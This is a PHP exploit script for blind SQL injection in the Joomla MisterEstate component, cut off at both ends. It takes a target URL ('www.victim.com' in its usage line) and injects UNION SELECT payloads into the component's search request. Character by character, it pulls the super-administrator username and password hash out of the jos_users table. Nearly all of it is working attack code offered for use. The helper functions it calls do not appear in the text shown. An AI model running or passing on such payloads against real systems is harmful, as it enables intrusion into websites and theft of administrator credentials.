Joomla Component MisterEstate Blind SQL Injection Exploit';
// http://www.misterestate.com/
ini_set( "memory_limit", "512M" );
ini_set( "max_execution_time", 0 );
set_time_limit( 0 );
if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
$url = "http://".$_GET['url']."/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component";
$data = array();
$data['src_cat'] = 0;
$data['country'] = 'no';
$data['state'] = 'no';
$data['town'] = 'no';
$data['district'] = 'no';
$data['mesearch'] = 'Start Search';
$admin = '';
$output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '" );
if( !testData( $output ) ) die('failed');
echo '
Check passed... trying exploit...
';
for( $i=0;$i<250;$i++ )
{
for( $j=48; $j<126; $j++ )
{
$output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,password),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
if( testData( $output ) )
{
ob_end_clean();
$admin .= chr( $j );
echo "Found character $i : buffer is now $admin
";
}
ob_end_clean();
}
}
echo "